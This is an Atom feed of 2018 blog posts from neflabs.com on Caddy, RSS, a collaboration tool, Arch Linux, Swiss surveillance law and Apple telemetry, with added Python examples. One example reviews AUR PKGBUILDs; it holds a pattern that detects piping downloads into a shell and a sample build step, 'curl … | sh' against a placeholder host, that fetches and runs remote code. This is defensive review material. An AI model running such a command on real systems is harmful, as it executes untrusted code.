<a href="https://www.youtube.com/watch?v=zH7MNMMmSRE&t=12m46s" target="_blank"><img class="embed" src="thumbnail.png" /></a>

<p class="pause">Fork Caddy</p>

<p>Let's recap: the sole developer of Caddy is censoring his own user base in order to push through an arbitrary decision that runs contrary to the original ethos of the application. This is no longer just a conversation about privacy; it is an issue of trust. If he says one thing ("Earning your trust is my most important interpersonal goal") but does the opposite, how can any server administrator trust Matt Holt or his software?</p>

<p><img class="embed" src="caddy.png"></p>

<p>If we were <i>Go</i> developers, we would fork Caddy into a new application, and move on. But we're not full-time developers (if you are, here's your shot at fame) which leaves us reaching out to the larger tech community to discuss the future of web servers, default TLS, and HTTP2. Where do we go from here?</p>

<p class="quote">Published April 30, 2018</p>

<p class="pause">Update May 01, 2018</p>

<p>In a heated debate on <a href="https://news.ycombinator.com/item?id=16958674" target="_blank">Hacker News</a>, Matt Holt continued to silence dissent, flagging the post and downvoting anyone who disagreed with him. He admitted, "I haven't actually watched the video", demonstrating his refusal to engage in a rational dialogue.</p>

<p>Another user suggested <a href="https://github.com/labstack/armor" target="_blank">Armor</a>, <a href="https://github.com/containous/traefik" target="_blank">Traefik</a>, and <a href="https://github.com/WedgeServer/wedge" target="_blank">Wedge</a> as alternatives to Caddy. We'll explore these options and review them soon.</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>Now Is The Perfect Time For An RSS Renaissance</title>
		<link href="https://neflabs.com/blog/rss-renaissance/" />
		<id>https://neflabs.com/blog/rss-renaissance/</id>
		<updated>2018-04-22T00:00:00Z</updated>
		<summary>As privacy and security breaches make headlines, we clamor for a decentralized internet. RSS doesn't offer perfect privacy, but it's one step back and two steps forward in the right direction.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">In the late 1990s</span> web developers were growing tired of combining every element - layout, design, and content - into a monolith of unmanageable code (in 2018, we're right back where we started, but more on that later). Updating even a few lines of content inside complex <a href="http://theworldsworstwebsiteever.com" target="_blank">table layouts</a> sometimes meant redesigning the entire site from scratch.</p>

<p>Eventual widespread adoption of Cascading Style Sheets (CSS) separated presentation from markup, but the content itself was still hard-coded into each page. To address this, employees at Netscape created a web syndication format known as RSS (originally RDF Site Summary, later Rich Site Summary), which let web developers publish content as a discrete, machine-readable document. Updating content no longer required altering the design or layout of a website. More importantly, subscribing to an RSS feed removes the need for visitors to manually check a website for new content.</p>

<p>That might sound silly today, in an era of centralized services (e.g. Facebook, Google) bombarding our inboxes, phones, and "feeds". As privacy and security breaches make headlines, we clamor for a decentralized internet. But less than twenty years ago, the internet <i>was</i> decentralized, when the human cycle of individualism versus collectivism was perfectly aligned with divergent expression. We've now spent the past decade attempting to build the perfect centralized web, only to realize its many faults. The cycle continues.</p>

<p>The modern web looks remarkably similar to 90's monoliths of unmanageable code: overbuilt websites which load <a href="https://www.soasta.com/blog/page-bloat-average-web-page-2-mb/" target="_blank">megabytes</a> of resources, massive external javascript libraries, unnecessary analytics tools applied to <i>"all the things"</i>, and advertising run amok. This leaning tower of jenga blocks lends itself neither to security nor to user privacy.</p>

<p>So the very idea of <a href="https://neflabs.com/atom.xml" target="_blank">RSS</a> - obtaining content from a website without having to visit the site itself - is due for a comeback. No ads. No suspicious javascript. Just the signal without the noise. It's not perfect privacy, but it's one step back and two steps forward in the right direction.</p>
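<p>As an added example (not part of the original post, and not neflabs.com's own code), here is a minimal Atom reader in Python that does what the paragraph above describes: it pulls titles, links and article bodies out of a feed and discards the scripts, frames and tracking images a browser visit would have loaded. The sample feed, the allow-list of formatting tags and the hostnames are all constructed for the example.</p>

```python
"""Added example: a minimal Atom reader that keeps the article and drops the
active content (scripts, frames, tracking images). The feed below is
constructed for the example and is not the neflabs.com feed."""
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

ATOM = "{http://www.w3.org/2005/Atom}"

# Constructed sample: one entry whose HTML body ships an inline script and a
# 1x1 tracking pixel alongside the actual article text.
SAMPLE_FEED = """<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Example Feed</title>
  <id>https://example.invalid/</id>
  <updated>2018-04-22T00:00:00Z</updated>
  <entry>
    <title>First post</title>
    <link href="https://example.invalid/first/" />
    <id>https://example.invalid/first/</id>
    <updated>2018-04-22T00:00:00Z</updated>
    <content type="html">&lt;p&gt;Hello &lt;b&gt;reader&lt;/b&gt;.&lt;/p&gt;
&lt;script src="https://tracker.invalid/t.js"&gt;&lt;/script&gt;
&lt;img src="https://tracker.invalid/pixel.gif" width="1" height="1" /&gt;</content>
  </entry>
</feed>
"""

# Allow-list of harmless formatting tags (an assumption for the example);
# everything else is dropped.
KEEP = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li",
        "h1", "h2", "h3", "blockquote", "pre", "code"}
# Tags whose whole body is discarded, not just the tag itself.
DROP_BODY = {"script", "style", "iframe", "object", "embed", "noscript"}


class _Sanitizer(HTMLParser):
    """Rebuilds the HTML keeping only KEEP tags and http(s) hrefs on <a>."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0  # nesting depth inside a DROP_BODY element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_BODY:
            self._skip += 1
            return
        if self._skip or tag not in KEEP:
            return
        kept = ""
        for name, value in attrs:
            # Only plain web links survive; javascript: URLs and event
            # handlers (onclick, ...) are dropped with every other attribute.
            if tag == "a" and name == "href" and value \
                    and value.startswith(("http://", "https://")):
                kept = f' href="{html.escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in DROP_BODY:
            self._skip = max(0, self._skip - 1)
            return
        if self._skip or tag not in KEEP or tag == "br":
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))


def sanitize_html(fragment):
    """Return the fragment with scripts, frames, images and unknown tags removed."""
    s = _Sanitizer()
    s.feed(fragment)
    s.close()
    return "".join(s.out).strip()


def parse_atom(xml_text):
    """Return a list of {title, link, updated, body} dicts, one per entry.

    For feeds from untrusted sources use defusedxml.ElementTree instead: the
    stdlib expat parser does not fetch external entities, but older builds
    will still expand entity-expansion bombs.
    """
    root = ET.fromstring(xml_text)
    entries = []
    for entry in root.iter(ATOM + "entry"):
        link = entry.find(ATOM + "link")
        content = entry.find(ATOM + "content")
        body = ""
        if content is not None:
            body = content.text or ""
            if content.get("type") == "html":
                body = sanitize_html(body)
        entries.append({
            "title": entry.findtext(ATOM + "title", default=""),
            "link": link.get("href", "") if link is not None else "",
            "updated": entry.findtext(ATOM + "updated", default=""),
            "body": body,
        })
    return entries


if __name__ == "__main__":
    for e in parse_atom(SAMPLE_FEED):
        print(e["updated"], e["title"], e["link"])
        print(e["body"])
```

<p>The allow-list approach matters more than the parser: a reader that merely removes <i>script</i> tags still fetches the tracking pixel and follows <i>javascript:</i> links, which is the noise RSS was supposed to leave behind.</p>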

<p class="quote">Published April 22, 2018</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>Announcing c0llude, A Free Tool For Private Collaboration</title>
		<link href="https://neflabs.com/blog/announcing-collude/" />
		<id>https://neflabs.com/blog/announcing-collude/</id>
		<updated>2018-04-18T00:00:00Z</updated>
		<summary>Your data belongs to you and your team, not government lawyers and spies. So we built c0llude with privacy from the ground up, and made it free, open-source, and self-hosted.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">You want to</span> make the world a better place. We want to help.</p>

<p>Almost every organization we work with has asked for the same two tools: encrypted messaging (we recommend <a href="https://signal.org" target="_blank">Signal</a>) and a platform for collaborative work. But few collaborative tools meet all of the requirements for anonymity and <a href="https://www.youtube.com/watch?v=pcSlowAhvUk" target="_blank">privacy</a>: free, open-source, and self-hosted.</p>

<p>Activist organizations are instead turning to Google and Facebook as platforms for team collaboration, putting themselves in the legal crosshairs of corporations and governments. For the past two years, the Department of Justice has sought to <a href="https://theintercept.com/2017/12/17/j20-inauguration-protest-trump-riot-first-amendment/" target="_blank">criminalize</a> activist organizations as a whole, based on the actions of a few members. In the course of one investigation, they issued <a href="https://lawandcrime.com/crazy/doj-seeking-info-on-6000-people-who-liked-anti-trump-facebook-page/" target="_blank">warrants</a> for the personal information of approximately 6,000 people who "liked" an anti-Trump Facebook page. In another investigation, Facebook simply handed over private account <a href="https://theintercept.com/2018/01/14/facebook-warrant-pipeline-protest-whatcom-county-justice-department/" target="_blank">details</a> despite the fact that no criminal charges had been filed.</p>

<p class="pause">Building A Better App</p>

<p>Your data belongs to you and your team, not government lawyers and spies. So we built c0llude with privacy from the ground up, under the following principles:</p>

<p class="cited"><b>Open Source</b><br />
Anyone can view and examine every line of our source code. You'll find that our software never tracks your activity, never phones home, and simply "does what it says on the box".<br /><br />

<b>Self Hosted</b><br />
Never trust another third-party platform with your data. Host unlimited instances of c0llude on any web server with PHP support, even your own web server at home.<br /><br />

<b>Flat File</b><br />
Databases are messy, and make backups annoying, even challenging. So we didn't use one. All user data is stored in flat files, which can be copied and migrated in a flash.<br /><br />

<b>Long-Term Support</b><br />
We believe in supporting our community by maintaining our software and responding quickly to our users. We'll offer long-term support to anyone who asks for it.<br /><br />

<b>Revolutionary Inbox</b><br />
Email is 1970s technology: it is not end-to-end encrypted, and it is easily tracked by government agencies and malicious actors. So we built a flat-file inbox which keeps your messages private.</p>

<p class="pause">Download</p>

<p>Visit <a href="http://c0llude.com" target="_blank">c0llude.com</a> for installation instructions.</p>

<p class="pause">You Can Help</p>

<p>c0llude is 100% free. Why? We believe payment information defeats user anonymity. No one should keep records of who uses our software, not even us. If you want to make a donation, sign up at our <a href="https://patreon.com/neflabs" target="_blank">Patreon</a> page, and help us continue to build and deliver free products.</p>

<p class="quote">Published April 18, 2018</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>Arch Linux, We Need To Talk</title>
		<link href="https://neflabs.com/blog/arch-linux-talk/" />
		<id>https://neflabs.com/blog/arch-linux-talk/</id>
		<updated>2018-04-01T00:00:00Z</updated>
		<summary>Arch Linux is a powerful, minimal operating system; it's the jackknife of the Linux community. But while developers love to tout their success with the OS, new users face unnecessary challenges.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">Arch Linux</span> is a powerful, minimal operating system; it's the jackknife of the Linux community. Unlike a typical OS which releases a new version once a year, Arch is based on a "rolling-release" model, offering updates as soon as developers publish them. In practice this means upstream security fixes reach users within days instead of waiting for the next annual release.</p>

<p>Arch purists are often called <i>"elitist"</i>, and it's easy to see why: as a command-line system, it's the best. The installer is akin to a manual transmission; you do all the work, which gives you complete control of your system. And if that sounds difficult, it's not. Most of the installation involves two simple commands, <i>pacstrap /mnt base</i> and <i>bootctl install</i>. The included wifi-menu tool is on par with any graphical user interface (take note, Debian developers: installers without wifi firmware need to die in 2018) and the iptables firewall is installed by default.</p>

<p>In short, more people <i>should</i> use Arch Linux, but while developers love to tout their success with the OS, new users face unnecessary challenges.</p>

<p><img class="embed" src="khan.jpg"></p>

<p>Arch uses a tool called "pacman" (aka Package Manager) to install new software. But a majority of new and interesting packages reside in a walled garden called the Arch User Repository (AUR), and pacman can't install them; users are expected to build them. There are tools known as <a href="https://wiki.archlinux.org/index.php/AUR_helpers" target="_blank">AUR Helpers</a> but pacman can't install those either (in an episode of Frasier, he and his brother decide to buy a restaurant, and to make it exclusive, suggest no signs, no advertising, and an unlisted phone number - their father quips, "Don't stop there! Maybe you can post some guards on the roof who can shoot people as they try to get in!").</p>
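<p>The practical consequence of "users are expected to build them" is a supply-chain one: an AUR package is a user-submitted shell script (the PKGBUILD) that makepkg runs with your privileges, so it should be read before it is built. As an added example (not an Arch or AUR tool, and not from the original post), the Python below automates the first pass of that review over a constructed PKGBUILD: it flags sources fetched over plain http, git sources not pinned to a commit, checksums set to SKIP, and build steps that pipe downloads into a shell. The package names, URLs and the heuristics themselves are assumptions for the example.</p>

```python
"""Added example: a quick pre-build review of an AUR PKGBUILD. Not an Arch
tool; the PKGBUILD texts below are constructed for the example."""
import re

# makepkg checks whichever of these arrays is present; listed strongest first.
CHECKSUM_ARRAYS = ("b2sums", "sha512sums", "sha256sums", "sha1sums", "md5sums")

# Heuristic patterns (assumptions) for things a build script should not do.
RISKY = (
    (re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"),
     "pipes a download straight into a shell"),
    (re.compile(r"\bsudo\b"), "invokes sudo from inside the build"),
    (re.compile(r"\bchmod\s+(-R\s+)?777\b"), "makes files world-writable"),
)


def _bash_array(text, name):
    """Return the items of a top-level bash array `name=( ... )`, or None."""
    m = re.search(rf"^{re.escape(name)}=\((.*?)\)", text, re.S | re.M)
    if m is None:
        return None
    return [item.strip("'\"") for item in m.group(1).split()]


def review_pkgbuild(text):
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    sources = _bash_array(text, "source") or []
    sums = None
    for name in CHECKSUM_ARRAYS:
        sums = _bash_array(text, name)
        if sums is not None:
            break
    if sources and sums is None:
        findings.append("no checksum array: makepkg cannot verify any source")
    for i, src in enumerate(sources):
        url = src.split("::", 1)[-1]  # entries may be written "localname::url"
        if url.startswith("http://"):
            findings.append(f"source[{i}] fetched over plain http: {url}")
        if url.startswith("git+") and "#commit=" not in url:
            findings.append(f"source[{i}] is a git checkout not pinned to a commit: {url}")
        if sums is not None and len(sums) > i and sums[i].upper() == "SKIP":
            findings.append(f"source[{i}] has checksum SKIP, so it is never verified")
    for pattern, why in RISKY:
        if pattern.search(text):
            findings.append(why)
    return findings


# Constructed PKGBUILD with several of the problems above.
SUSPECT_PKGBUILD = """pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/example-tool-$pkgver.tar.gz"
        "git+https://example.invalid/example-tool.git"
        "http://mirror.invalid/extra.bin")
sha256sums=('e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
            'SKIP'
            'SKIP')

build() {
  cd "$srcdir/example-tool-$pkgver"
  curl -s https://example.invalid/setup.sh | sh
  make
}
"""

# Constructed PKGBUILD that passes: https source, real checksum, no surprises.
CLEAN_PKGBUILD = """pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855')

build() {
  cd "$srcdir/example-tool-$pkgver"
  make
}
"""

if __name__ == "__main__":
    for finding in review_pkgbuild(SUSPECT_PKGBUILD):
        print("-", finding)
```

<p>This is a first pass, not a verdict: a PKGBUILD can pass every check here and still do something unpleasant in <i>package()</i>, so the manual read that the AUR has always expected of its users still applies.</p>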

<p>Arch also suffers from <i>ecosystem fatigue</i>: while developers have their heads down maintaining old packages, they miss new and exciting software. For example, Arch maintains the Chromium browser, the open-source project on which Google Chrome is built. But a much better, privacy-focused build called <a href="https://ungoogled-software.github.io/ungoogled-chromium-binaries/" target="_blank">UnGoogled Chromium</a> has been released by independent developers. Arch only carries it in the AUR, requiring a processor-intensive and lengthy manual build, a huge turn-off for average users. Alternatively, one might try to download the binaries, but as users have pointed out,</p>

<p class="quote">"maybe it is because the binary is linked to debian's old libraries, saddly [sic], most of the required libraries doesn't exist in the aur ... sorry for any inconvenience ... I have no control over [them], all problems should go there."</p>

<p>But for many new users, the final straw lies in attempting to install a desktop environment (graphical user interface). Arch is known for maintaining a detailed knowledge base, but when it comes to desktop environments, relevant documentation is often missing or misleading, and what's left is written for Black Belt Developers. The result? Following the instructions to the letter leaves users with a half-built desktop.</p>

<p>Consider the <a href="https://wiki.archlinux.org/index.php/Cinnamon" target="_blank">Cinnamon</a> desktop environment. It runs on the X Window System, which means users must first install, at a minimum, the <i>xorg</i>, <i>xorg-apps</i>, and <i>xorg-xinit</i> packages. But the documentation for Cinnamon only says, "Cinnamon can be installed with the package <i>cinnamon</i>." Even the <a href="https://wiki.archlinux.org/index.php/Xorg" target="_blank">X Window System</a> documentation fails to mention the <i>xorg-xinit</i> package. What fresh hell is this? Are new users expected to purchase a crystal ball?</p>

<p>Arch purists say the OS isn't meant to do <b>#allthethings</b> but at the end of the day, an operating system's value comes down to one question: can it be used as a daily computing environment? If the answer is no, then its features - simplicity, modernity, pragmatism, versatility - don't matter.</p>

<p class="pause">Let Pacman Run The Show</p>

<p>Pacman is already a versatile package manager; there's no need to reinvent the wheel with "helpers" like yaourt (in fact, let's retire the name "yaourt" and never speak of it again). In an ideal world, pacman would install packages from the AUR with a simple flag, <b><i>pacman -a [package_name]</i></b>, and that's it. Leave the option for advanced users to compile packages from source, but for the rest of us, keep it simple.</p>

<p class="pause">Build It, And They Will Download</p>

<p>Arch developers pride themselves on doing things "the Arch way". Better. Faster. Efficient. So where's the official Arch desktop environment? It should be minimalist and easily installed from a single package group. The world is waiting, take the challenge and knock our socks off. Put Windows and MacOS to shame. Here's my ideal desktop environment:</p>

<p class="cited">
<b>Keyboard / Window Manager</b> &emsp; xmodmap, xbindkeys, setxkbmap? Enough. Offer one tool to rule them all in a unified, editable configuration file. 2BWM is a great window manager, but it too needs an external settings file, no more recompiling config.h just to change a border color.<br /><br />

<b>Terminal Emulator</b> &emsp; Rxvt-unicode, using true semi-transparency by default, running SF Mono 12pt (which is beautiful in a terminal) or better yet, build a near-identical open source font and call it Arch Mono, use it for everything.<br /><br />

<b>App Launcher</b> &emsp; Rofi, running in fullscreen mode with true transparency by default. Use a massive font size to keep it easy to read. A single configuration file should allow users to add their own custom shortcuts to launch apps.<br /><br />

<b>Browser</b> &emsp; Ungoogled Chromium (of course). It should run incognito mode by default, and automatically clear cache / history / everything upon quit.
</p>

<p class="pause">Pay It Forward</p>

<p>Those of us with money must step up and invest in developers who are creating the next generation of Unix applications. Give to <a href="https://venam.nixers.net/blog/" target="_blank">Patrick Louis</a> who created 2BWM, give to <a href="https://mrchromebox.tech" target="_blank">Matt DeVillier</a> who works his ass off to provide upstream coreboot firmware, give to <a href="https://github.com/Eloston" target="_blank">Eloston</a> who builds the privacy-focused browser we all demanded, and give to all the designers on <a href="http://reddit.com/r/unixporn/" target="_blank">r/unixporn</a> who showcase beautiful user interfaces of the future.</p>

<p class="quote">Published April 01, 2018</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>Switzerland's "NSA" Comes Online In Two Weeks</title>
		<link href="https://neflabs.com/blog/swiss-nsa-march/" />
		<id>https://neflabs.com/blog/swiss-nsa-march/</id>
		<updated>2018-02-14T00:00:00Z</updated>
		<summary>Wide-sweeping laws will affect internet access, email, and "other telecommunications services", including messaging services, social networking communications, cloud platforms, and proxy services.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">Switzerland</span> has long been known for keeping the secrets of foreign governments and individuals, including financial transactions and more recently, digital transactions. For the past few years, startups have built encrypted software services (such as <a href="https://en.wikipedia.org/wiki/ProtonMail" target="_blank">ProtonMail</a> and ProtonVPN) on Swiss servers, away from the prying eyes of US intelligence services. Customers from around the world have relied on the sovereignty of Swiss borders - and Swiss courts - for digital privacy. But all of that could soon come crashing down.</p>

<p>In early March 2018, a series of new <a href="https://www.ejpd.admin.ch/ejpd/de/home/aktuell/news/2017/2017-11-151.html" target="_blank">laws</a> will allow "for the provision of information requests, real-time interceptions, retroactive interceptions (historical data), emergency searches and tracing" and require dozens of domestic ISPs to operate permanent surveillance systems.</p>

<p class="quote">"The ISP and the providers of communication services with more extensive information and monitoring obligations must retain the details of the telecommunications services for the purpose of identification for the duration of the customer relationship and for 6 months after the termination of the contract be able to deliver it."</p>

<p>These wide-sweeping laws <a href="https://www.ejpd.admin.ch/dam/data/ejpd/aktuell/news/2017/2017-11-15/vuepf-d.pdf" target="_blank">affect</a> internet access, email, and "other telecommunications services", including messaging services, social networking communications, cloud platforms, and proxy services. Businesses are expected to hand over customer data (name, date of birth, address, ID card number, IP address, etc) to authorities upon request.</p>

<p>Although the European Union is about to bring the General Data Protection Regulation (GDPR) into force to bolster digital privacy rights, Switzerland is not an EU member state, so the GDPR does not directly protect Swiss citizens' data held by Swiss providers.</p>

<p>A related upcoming Supreme Court <a href="http://www.eweek.com/cloud/google-amazon-among-it-giants-backing-microsoft-in-supreme-court-case" target="_blank">battle</a> between Microsoft and the US Department of Justice threatens to let US authorities compel American companies to hand over data stored on foreign servers under a domestic warrant. The final ruling could further damage public perception of Swiss privacy.</p>

<p class="quote">Published February 14, 2018</p>

<p class="pause">Update February 14, 2018</p>

<p>ProtonMail has reached out and pointed to a blog <a href="https://protonmail.com/blog/swiss-surveillance-law/">post</a> from 2015, which suggests their email service will be "exempt",</p>

<p class="quote">"The new laws could compel us to hand over data that we have, but ... any obligations for service providers to remove encryption wouldn’t apply because the encryption is applied by the end-user on their device, and not by ProtonMail."</p>

<p>However, ProtonMail has not denied that it could be compelled to hand over unencrypted email sent or received via its service, or that its VPN service could be forced to retain and disclose user metadata and activity logs.</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>This Apple Core Is Rotten</title>
		<link href="https://neflabs.com/blog/apple-rotten/" />
		<id>https://neflabs.com/blog/apple-rotten/</id>
		<updated>2018-01-20T00:00:00Z</updated>
		<summary>What was once the champion of user experience is now a corporation led by sales and marketing executives making unilateral and arbitrary decisions. I'm calling it. Apple is dead.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">As a teen</span> growing up in the 90's, I was obsessed with two things: posters of boys and cars on my bedroom walls, and owning an Apple computer. I spent hours modifying my Windows 98 SE desktop to look "like a Mac", hunting down Mac OS 9 desktop wallpapers, system icons, and themes which made my Start Menu look like an Apple logo.</p>

<p>Hooverphonic (<i>Renaissance Affair</i>), Nick Drake (<i>Pink Moon</i>), and J Ralph (<i>One Million Miles Away</i>) played in Volkswagen television ads. The world wide web was in the middle of a paradigm shift, as the first wave of user-generated content hit Tripod, Angelfire, and Geocities. In an era before blogs, personal websites gave users a sense of credibility and legitimacy as digital designers and self-proclaimed hackers. Sites built with Macromedia Flash generated respect among teen audiences for their epileptic seizure-inducing animations and autoplay music. Right-click blocking javascript, which prevented visitors from viewing a site's source code, was considered cool.</p>

<p>Apple found itself caught up in the fashion of the moment, its <i>aqua</i> style buttons and striped design elements mirrored on hundreds of thousands of personal websites alongside colors inspired by its Blueberry, Grape, Tangerine, Lime, and Strawberry iMac G3 computers. At the turn of the century, the iPod became the ultimate public statement of peer-to-peer music file sharing, popularized by Napster, Limewire, and Kazaa. Instead of competing on hardware specs, Apple offered a unique aesthetic and user experience to young tech evolutionaries, and captured a dedicated following.</p>

<p>No one understood this better than late CEO Steve Jobs, who famously <a href="https://www.youtube.com/watch?v=_1rXqD6M614" target="_blank">prioritized</a> product development, and warned that product companies led by sales and marketing executives were digging their own graves. Today, Apple is led by sales and marketing executives.</p>

<p class="cited">
<b>1999</b> &emsp; PowerMac G4, graphite (Mac OS X 10.2 Jaguar)<br />
<b>2004</b> &emsp; iBook G4 12-inch laptop, white (Mac OS X 10.3 Panther)<br />
<b>2004</b> &emsp; AirPort Express, gen 1<br />
<b>2006</b> &emsp; Macbook 13-inch laptop, white (Mac OS X 10.4 Tiger)<br />
<b>2010</b> &emsp; iPhone 4, white (iOS 4)<br />
<b>2011</b> &emsp; iPhone 4S, black (iOS 5)<br />
<b>2012</b> &emsp; Macbook Pro Retina 13-inch laptop (Mac OS X 10.8 Mountain Lion)<br />
<b>2012</b> &emsp; AirPort Express, gen 2<br />
<b>2013</b> &emsp; iPhone 5S, space gray (iOS 7)<br />
<b>2014</b> &emsp; iPad Mini 3, WiFi + Cellular, black<br />
<b>2015</b> &emsp; Retina Macbook 12-inch laptop, gold (Mac OS X 10.11 El Capitan)<br />
<b>2016</b> &emsp; Retina Macbook 12-inch laptop, space grey (MacOS 10.12 Sierra)<br />
<b>2016</b> &emsp; iPhone 6S Plus, silver (iOS 9)<br />
<b>2017</b> &emsp; Retina Macbook 12-inch laptop, space grey (MacOS 10.13 High Sierra)<br />
<b>2017</b> &emsp; iPad Air 2, WiFi, black<br />
<b>2017</b> &emsp; iPhone 7, black (iOS 10)
</p>

<p>Above: A detailed list of product purchases from Apple, spanning almost two decades. Technically the PowerMac G4 was a gift from my Dad. Thanks Dad!</p>

<p>Apple's user experience has taken a back seat to unilateral and arbitrary decisions: useful ports have disappeared from laptops, fingerprint security was eliminated from their latest phone, <a href="https://arstechnica.com/gadgets/2016/03/there-are-ways-the-fbi-can-crack-the-iphone-pin-without-apple-doing-it-for-them/" target="_blank">dark patterns</a> rule the mobile experience, MacOS and iOS suffer from an unending series of bugs and security vulnerabilities, the entire wireless router division was taken out back and shot years ago, and somehow prices are skyrocketing.</p>

<p>For years, Apple's prices were justified: laptops built with an aluminum chassis, high quality components, a solid Unix-based operating system, and excellent customer service and warranties. You got what you paid for, the products lasted forever, and so did their resale values. But $1,000 for an iPhone X? You've got to be kidding me. The lackluster iPhone 8, which sells for $700, still uses LCD screen technology and a proprietary Lightning connector. Competitors like OnePlus offer a much more efficient AMOLED screen and USB-C charging - for $500.</p>

<p class="pause">Don't Confuse Security For Privacy</p>

<p>Starting with the iPhone 5S, Apple set the <a href="https://www.apple.com/business/docs/iOS_Security_Guide.pdf" target="_blank">benchmark</a> for mobile device security. Today's iOS devices offer a suite of security features, including a secure boot chain, secure enclave co-processor, AES 256-bit cryptography, and app code signing. Desktop products are similarly well equipped.</p>

<p>While hardware security will stop a thief from digging through your personal or corporate secrets, it won't protect you from the No. 1 threat to your privacy: Apple itself. MacOS and iOS send an enormous amount of telemetry to Apple servers every minute, including during boot, before any user-space outbound firewall has loaded. Some MacOS services even send data over port 80, unencrypted!</p>

<p class="code">
Port &emsp; Hidden App &emsp; Outbound Connection<br /><br />
&nbsp;&nbsp;80 &emsp; avconferenced &emsp; --- &emsp; init.ess.apple.com<br />
&nbsp;&nbsp;80 &emsp; captiveagent &emsp; --- &emsp; captive.apple.com<br />
&nbsp;&nbsp;80 &emsp; identityservicesd &emsp; --- &emsp; init-p01md.apple.com<br />
&nbsp;&nbsp;80 &emsp; itunes &emsp; --- &emsp; mgr.gcsp.cddbp.net<br />
&nbsp;&nbsp;80 &emsp; systeminformation &emsp; --- &emsp; support-sp.apple.com<br />
</p>

<p class="code">
Port &emsp; Hidden App &emsp; Outbound Connection<br /><br />
&nbsp;443 &emsp; akd &emsp; --- &emsp; gsa.apple.com<br />
&nbsp;443 &emsp; appstore &emsp; --- &emsp; itunes.apple.com<br />
&nbsp;443 &emsp; appleidauthagent &emsp; --- &emsp; setup.icloud.com<br />
&nbsp;443 &emsp; apsd &emsp; --- &emsp; albert.apple.com<br />
&nbsp;443 &emsp; ckkeyrolld &emsp; --- &emsp; configuration.apple.com<br />
&nbsp;443 &emsp; cloudd &emsp; --- &emsp; gateway.icloud.com<br />
&nbsp;443 &emsp; geod.xpc &emsp; --- &emsp; ls.apple.com<br />
&nbsp;443 &emsp; commerce &emsp; --- &emsp; init.itunes.apple.com<br />
&nbsp;443 &emsp; keyboardservicesd &emsp; --- &emsp; configuration.apple.com<br />
&nbsp;443 &emsp; mapspushd &emsp; --- &emsp; ls.apple.com<br />
&nbsp;443 &emsp; nsurlsessiond &emsp; --- &emsp; valid.apple.com<br />
&nbsp;443 &emsp; parsecd &emsp; --- &emsp; api.smoot.apple.com<br />
&nbsp;443 &emsp; passd &emsp; --- &emsp; smp-device-content.apple.com<br />
&nbsp;443 &emsp; photolibraryd &emsp; --- &emsp; ls.apple.com<br />
&nbsp;443 &emsp; softwareupdated &emsp; --- &emsp; swscan.apple.com<br />
&nbsp;443 &emsp; stocks.appex &emsp; --- &emsp; apple-finance.query.yahoo.com<br />
&nbsp;443 &emsp; storeassetd &emsp; --- &emsp; buy.itunes.apple.com<br />
&nbsp;443 &emsp; systemmigrationd &emsp; --- &emsp; swscan.apple.com<br />
&nbsp;443 &emsp; touristd &emsp; --- &emsp; help.apple.com<br />
</p>

<p>Nefarious Laboratories also discovered Apple devices connect to smoot.apple.com every few seconds, relaying Safari and Spotlight search suggestions to Apple - even when users disable those features. They're essentially <a href="https://news.ycombinator.com/item?id=8473580" target="_blank">keyloggers</a>. Apple devices also connect to apple-dns.net for DNS requests, bypassing your local network settings. This means every domain you visit, e.g. pornhub.com, is sent unencrypted over the internet to Apple.</p>
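<p>To check the lists above on your own machine rather than take them on faith, <i>lsof -i -P</i> prints every open socket with the owning process, the remote hostname and the numeric port. The Python below (an added example, not Apple's code and not the tooling used for the tables above) parses that output, reports which daemons are talking to which Apple hosts and singles out connections on plaintext ports. The sample lines are constructed to resemble lsof output, and the set of ports treated as unencrypted and the vendor domain suffixes are assumptions for the example.</p>

```python
"""Added example: classify `lsof -i -P` output by process, remote host and
port. The sample below is constructed, not captured from a real Mac."""
import re

# host:port->host:port as lsof prints it when run without -n
_CONN = re.compile(r"(\S+):(\d+)->(\S+):(\d+)")

PLAINTEXT_PORTS = {80, 8080, 21, 23}        # assumption: treated as unencrypted
VENDOR_SUFFIXES = ("apple.com", "icloud.com", "apple-dns.net")  # from the tables

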